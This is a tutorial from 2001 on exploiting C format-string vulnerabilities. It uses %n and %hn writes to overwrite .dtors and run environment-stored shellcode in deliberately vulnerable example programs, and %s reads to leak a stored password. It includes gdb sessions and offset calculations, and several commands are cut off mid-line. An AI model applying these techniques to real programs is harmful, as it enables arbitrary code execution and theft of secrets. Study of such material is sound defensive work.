Format String Technique

Written by: NOP Ninjas


Required:
Helpful but Optional:


This document is not a definitive guide to exploiting format strings; much of the rest comes from experimenting. I hope this paper explains how things are done in an easy-to-understand manner. Wherever possible, I have tried to demonstrate through examples.


First, format strings in C should be examined. Only a few of the format characters are relevant to this discussion. Any search engine should yield a more thorough list of websites with further information.

  %x  - Print the argument as a hex value.
  %s  - Print the char string at the address passed to it.
  %d  - For our purposes this just prints strings of data to
        increment the byte count. Should not be used: it can
        create unwanted '-' signs in the output.
  %u  - For our purposes this just prints strings of data to
        increment the byte count. It is unsigned, as compared to
        %d which is signed, so a negative value can never add
        a '-' into the output.
  %n  - Write the number of bytes written so far to the address
        passed to it.

Functions that take a format string are vulnerable when the programmer passes user-supplied data as the format string itself instead of as an argument to a format.

  incorrect: printf(string);
    correct: printf("%s", string);

This simple mistake can lead to a big security risk. All functions in the printf family have this problem (printf, fprintf, sprintf, snprintf, vsprintf, vsnprintf, etc.). Other functions also take formats (like syslog).

More formatting

When the programmer does not supply any arguments, each conversion simply takes the next value off the stack, starting with the first. With the "$" format modifier, any of the passed arguments can be referenced directly. For example:

  printf("%2$x %1$x\n", 0x1, 0x2);

would output:

  "2 1"

Stack offsets

Some knowledge of how the stack works is helpful but not required. The most important thing to learn is where input data lies in relation to the current stack position. This crude diagram shows the layout:

 Bottom                                         Top 
 [ user stack ][ command line args ][ environment ]

As noted, this is a crude diagram to illustrate the general layout. The current position will be somewhere in the user stack. It is possible to pop arguments off the stack to be displayed in hex with %x. With multiple %x formats it is possible to reach the top of the stack.

Using the "$" modifier, any argument can be accessed directly by its stack offset. Instead of a long string of %x's there could be one "%95$x". Being able to access user input via stack offsets is crucial to the exploitation of format strings.

%n madness

The %n format writes the number of bytes already written into the int pointed to by its argument. When no argument is given, it uses the next value on the stack as that pointer. %n can be combined with the "$" modifier to select any argument offset. %hn does the same thing, but writes a short. Here is an example of how it can be used:

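  #include <stdio.h>

  int main(int argc, char *argv[]) {
    int num = 0;

    if (argc < 2)
      return 1;
    printf("%s%n\n", argv[1], &num);   /* num = strlen(argv[1]) */
    printf("Bytes written: %#x\n", num);
    return 0;
  }

  sloth@sin:~/source/nopninjas$ ./test 1234567890
  1234567890
  Bytes written: 0xa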

Notice that 0xa = 10. To write 0xbfff, write 49151 characters into argv[1]. To test this out:

  sloth@sin$ ./test `perl -e 'print "A"x49151'`
  ... lots of A's ...
  Bytes written: 0xbfff

This method can be abused by supplying an arbitrary address. This is what makes format strings lethal.

Exploiting basic format strings

It is not always simple to place the input data somewhere on the stack where it is easily reached. The following is a very simple case where it is:

fmt1.c ----------------------------------------------------

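#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
  char buf[1024];

  strncpy(buf, argv[1], sizeof(buf) - 1);
  buf[sizeof(buf) - 1] = '\0';
  printf(buf);   /* vulnerable: user data used as the format string */
  return 0;
}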

sloth@sin$ ./fmt 'AAAA %x'
AAAA 41414141

Finding the input arguments / Generating the debugging string

The input is the next argument on the stack. Next, expand the string into a more realistic form so that the offsets on the stack still match up after the command line arguments change. Use easyflow during the testing phase of writing format string exploits; either the UNIX printf command in the shell or Perl will also suffice. Keep in mind the little-endian byte ordering of the addresses: easyfl's \l01020304 is the same as printf/perl's \x04\x03\x02\x01.

sloth@sin$ ./fmt `easyfl '\l41414141\l42424242   \
AAAABBBBCCCCDDDD109479558541414141111163859442424242  \

Here is the output with the values bracketed:

AAAABBBBCCCCDDDD1094795585(41414141)1111638594(42424242)  \

Each of the 4 byte address strings will eventually point to a location in memory that needs to be written. Any 4 byte strings that are easily recognizable in a mess of data will do. If the %x offsets are correct, each of the address strings should be printed as hex in the order given. It is possible to put brackets around the %x to make the output easier to read, but in more complicated examples the extra characters may change the stack layout, throwing off the argument offset values.

The %.010u will print out 10 bytes of data. Later these will be modified to change the values that %n writes. The count that %n stores is the total number of bytes written so far: for the first %n that is the 16 bytes of address strings plus these 10 bytes, and each following write adds to that accumulated total. For now, they are there to keep the string as static in length as possible during testing, which reduces the chances of the offsets shifting.

Since the first address is at the first argument offset on the stack we could just use %x. To conform with the rest of the string we can convert it to: %1$x. Each following address is selected by increasing the offset: %1$x %2$x %3$x %4$x.

Placing the shellcode / What to overwrite ?

For simplicity put the executable code into our environment:

sloth@sin$ EXECSHELL=`easyfl '[200,\x90] \
sloth@sin$ export EXECSHELL

Also for simplicity, overwrite .dtors. Further information on overwriting .dtors can be found at:

To find the beginning of the .dtors section, use "nm <execname>" or a similar utility to view the symbol table. In gdb, the .dtors address can be obtained with "maintenance info sections".

sloth@sin$ nm fmt
... skipping ...
080494a8 ? __DTOR_END__
080494a4 ? __DTOR_LIST__
... skipping ...

Above is the trimmed output from nm. The address that needs to be written is 4 bytes past the start of the .dtors section (__DTOR_LIST__): 0x080494a4 + 4 = 0x080494a8.

Creating/Debugging the writing format string

Now that there is an address to write to, it needs to be put into the format string. Each following address is incremented by 1 to point to the next byte in memory to write to: 0x080494a8, 0x080494a9, 0x080494aa, 0x080494ab.

sloth@sin$ ./fmt `easyfl '\l080494a8  \
\l080494a9\l080494aa\l080494ab%.010u%1$n%.010u%2$n%.010u%3$n  \
... output not useful ...
Segmentation fault (core dumped)

sloth@sin$ gdb fmt core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
... skipping ...
(gdb) bt
#0  0x382e241a in ?? ()
#1  0x8048479 in _fini ()
#2  0x4003d80d in exit () from /lib/
#3  0x4003557d in __libc_start_main () from /lib/

This shows that it crashed during the destructor phase (_fini). EIP (0x382e241a) looks random at the moment because none of the bytes have been adjusted yet.

Finding the shellcode

Next, the address of the executable code in the environment needs to be found. gdb is the way to go. This topic is covered in the suggested reading material.

sloth@sin$ gdb fmt core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
... blah blah ...
#0  0x382e241a in ?? ()
(gdb) x/2000x $ebp
0xbffff854: 0xbffff860      0x08048479      0x401019b4      0xbffff874
0xbffff864: 0x4003d80d      0x401019b4      0x4000aa70      0xbffff8c4
0xbffff874: 0xbffff898      0x4003557d      0x00000001      0x00000002
... pages of data in hex ...
0xbffffec4: 0x2f65646b      0x3a6e6962      0x7273752f      0x6168732f
0xbffffed4: 0x742f6572      0x666d7865      0x6e69622f      0x45584500
0xbffffee4: 0x45485343      0x903d4c4c      0x90909090      0x90909090
0xbffffef4: 0x90909090      0x90909090      0x90909090      0x90909090
0xbfffff04: 0x90909090      0x90909090      0x90909090      0x90909090
... BINGO! ...

Starting from EBP ($ebp in gdb), search for the hex representation of the NOPs in the shellcode with "x/x". Above, 0x90909090 is at 0xbfffff04.

Creating the final string / Calculation

Always remember to write from the least significant byte to the most significant (lowest address to highest): each %n stores a full 4-byte int, so every later write overwrites the upper bytes left behind by the previous one. In this case, the %u before the first %n is the one to increment. There are 2 ways to do this: calculate how many more bytes are needed, or guess and adjust as needed. In small examples like this one, guess and check will work; however, sometimes a lack of output makes it necessary to calculate the value exactly.

0x382e241a can be broken down into each byte as it was written. First, 0x1a (26 in decimal) shows that 26 bytes were written before the first %n: 16 bytes for the addresses 0x080494a8 0x080494a9 0x080494aa 0x080494ab plus 10 more from "%.010u". The next byte, 0x24 (36 in decimal), is the 26 bytes already written plus another 10 from the second "%.010u". 0x2e (46 in decimal) is another 10 bytes more than the last, and the same goes for 0x38 (56 in decimal).

It is usually not necessary to modify the least significant byte, as long as the resulting address still lands in the NOP sled. Keeping 0x1a gives an address a little above the NOPs seen at 0xbfffff04, so the new goal address to write is 0xbfffff1a.

  0xbfffff1a = [191][255][255][ 26]
  255 - 26(4*4+10 bytes for argument addresses + %.010u) = 229
  255 - 255 = 0    <-- Nothing has to be written for the 3rd byte

  (amount needed) - (already written) = (amount left to write)

Subtract the amount of bytes already written from the amount of bytes needed; the result is the value to put into the precision of %u. Looking ahead slightly, the third byte is also 255, so the count that was just reached can be reused: since 255 bytes will already have been written, the third %u can be removed and %3$n can follow %2$n directly. Here is the current string so far:

  sloth@sin$ ./fmt `easyfl '\l080494a8\l080494a9\l080494aa  \

  Summary: [%.010u %1$n %.229u %2$n %3$n][%.010u %4$n]

If the bytes already written cannot be subtracted from the needed value without a negative answer, the last write has to roll over into the next significant byte: add 256 to the needed value, then subtract as before.

        255 = 0xff
  255 + 256 = 0x1ff   <-- roll over

        191 = 0xbf
  191 + 256 = 0x1bf(447)
  447 - 255 = 192

192 bytes will have to be written with %u to get the last value in place. The final string should look like:

  sloth@sin$ ./fmt `easyfl '\l080494a8\l080494a9\l080494aa  \

  Summary: [%.010u %1$n %.229u %2$n %3$n %.192u %4$n]

Executing the string

It's time to execute it and check the results. In the example the "hello world" shellcode was used. It will just print the string and exit. An extra "; echo" at the end will add a new line after the "hello world" because the default shellcode in easyfl does not contain a "\n".

sloth@sin$ ./fmt `easyfl '\l080494a8\l080494a9\l080494aa \
\l080494ab%.010u%1$n%.229u%2$n%3$n%.192u%4$n'`; echo
013451792800000000000000000000000000000000000000000000000000000000  \
000000000000000000000000000000000000000000000000000000000000000000  \
000000000000000000000000000000000000000000000000000000000000000000  \
000000000000000000000000000000001345179290000000000000000000000000  \
000000000000000000000000000000000000000000000000000000000000000000  \
000000000000000000000000000000000000000000000000000000000000000000  \
hello world 

The odd numbers inside the string of 0's are the values popped from the stack by each %u. Without the "$" modifier on %x or %n, dummy arguments would have to be placed in the buffer for each %u to consume, like this:

  [%u arg][%n arg][%u arg][%n arg][%u arg][%n arg][%u arg][%n arg]
  real: [AAAA][\l080494a8][AAAA][\l080494a9] etc...

Shortening the format string

It is not necessary to use 4 writes. It is possible to use only 2 writes of 2 bytes each. This way other data is not accidentally overwritten when a value has to roll over into the next significant byte, and the string becomes even shorter. For safety, %hn is used here even though plain %n could work. Using the last example, we can build our sample string.

  The 2 locations that need to be written to (.dtors)
  0x080494a8 0x080494a8+2  <-- The second argument address is 
                               incremented by 2.

  0xbfffff1a is still our shellcode address. We can break this up:

  0xbfff = 49151
  0xff1a = 65306

  65306 - 8(bytes for addresses) = 65298(bytes left for %u to write)
  49151 + 65536 = 0x1bfff
  0x1bfff(total) - 0xff1a(already written) = 49381(needed)

No more goofing around. Let's test it out:

  sloth@sin$ ./fmt `easyfl '\l080494a8\l080494aa%.65298u%1$hn  \
%.49381u%2$hn'`; echo
  hello world

Yet another format string is broken.

Format strings on the heap

For the next example the format string will be placed on the heap. Because this is a local hole, exploiting it should be fairly trivial.

fmt2.c ----------------------------------------------------------

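#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
  char *blah = malloc(1024);

  if (blah == NULL)
    return 1;
  fgets(blah, 1023, stdin);
  printf(blah);   /* vulnerable: the format string lives on the heap */
  free(blah);
  return 0;
}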

Placing the addresses on the stack

Sometimes the input buffer for the format string is not on the stack at all. On a local system, getting the addresses onto the stack anyway is a simple task: they can be placed in an argument string to the program or in the environment. Watch out for characters that cannot be passed, such as \x00 on the command line.

  sloth@sin$ export ADDYS="AAAAAAAA"
  sloth@sin$ ./fmt2 'AAAAAAAA'  (must be done with each execution)

Finding hard to reach data

To find the general offset a simple bash loop can be used:

  sloth@sin$ for (( I=1; I<500; I=`expr $I + 1` )); do      \
( echo "$I %$I\$x" ) | ./fmt2 |grep 4141; done
  364 4141413d
  365 41414141

Aligning the data

As you can see, the alignment is off because of the rest of the data in the environment.

  sloth@sin$ export ADDYS="AAAABBBB"
  sloth@sin$ (echo '%.00010u%364$x%.00010u%365$x') | ./fmt2 
  Bracketed: 0134518248(4141413d)1073743880(42424241)

Appending one alignment character to ADDYS shifts the string by a byte, so each address fills a whole stack word and no neighboring characters leak in.

  sloth@sin$ export ADDYS="AAAABBBBX"
  sloth@sin$ (echo '%.00010u%364$x%.00010u%365$x') | ./fmt2
  Bracketed: 0134518248(41414141)1073743880(42424242)

Everything is aligned now. It is time to put the addresses for .dtors into the environment.

Finishing touches

  sloth@sin$ export ADDYS=`easyfl '\l080494f4\l080494f6X'`

This format string has no addresses or other data printed before it, so the first %u must write the exact amount by itself.

           0xff1a = 65306
 0x1bfff - 0xff1a = 49381

  sloth@sin$ (echo '%.65306u%364$hn%.49381u%365$hn') | ./fmt2; echo
  hello world

Again the hello world shellcode is executed.

Misc Stuff

About blind and remote (non-stock binary) attacks

When it comes to blind or remote format strings, it is necessary to be very precise. Exact calculations, as well as stack dumps with %x, can be very helpful. .dtors is really only useful when there is access to the binary. This is all stuff that is best learned through experimentation.

Types of real world format strings

fprintf, printf, sprintf, snprintf, vfprintf, vprintf, vsprintf, vsnprintf, setproctitle, syslog, and more. These are all commonly misused in the real world. Here is an example of a misused vsnprintf (a personal favorite).

fmt4.c ------------------------------------------------

#include <stdio.h>
#include <stdarg.h>

void printing(char *fmt, ...) {
  va_list ap;
  char output[1024];

  va_start(ap, fmt);
  vsnprintf(output, sizeof(output), fmt, ap);
  va_end(ap);
  printf("ARG: %s\n", output);
}

int main(int argc, char *argv[]) {
  if (argc > 1)
    printing(argv[1]);   /* <-- vulnerable: printing() must be given a format */

  /* correct usage */
  /* if (argc > 1) printing("%s", argv[1]); */
  return 0;
}

How to abuse %s

With %s, any string in valid memory can be output. It could be a password, user data, environment variables, or anything else that could be useful. Here is a sample of how to abuse %s:

password.c -----------------------------------------------

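  #include <stdio.h>
  #include <string.h>

  static char password[] = "hax0r";

  int main(int argc, char *argv[]) {
    char buf[256];

    strncpy(buf, argv[1], sizeof(buf) - 1);
    buf[sizeof(buf) - 1] = '\0';
    printf(buf);   /* vulnerable: user data used as the format string */
    return 0;
  }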

With the output of nm the address of password can be found.

  sloth@sin$ nm test
  ... skipping ...
  08049484 d password
  ... skipping ...

  0x08049484 is the address of password.

  sloth@sin$ ./test `easyfl '\l08049484%s'`; echo

This is just a very basic example. By using %x to dump values off the stack (some of which may be pointers into the heap or elsewhere), it may be possible to feed those addresses to %s and find out more about what exactly is happening.

Information
  - My stupid site. Links to resources, news, and wargames.
  - Wargames collection (vuln dev). Thanks to dies and all the
    maintainers of the various servers. Also all those who help others.
  - More wargames - good stuff
  - Cool people [RsN]. Also runs

12/09/01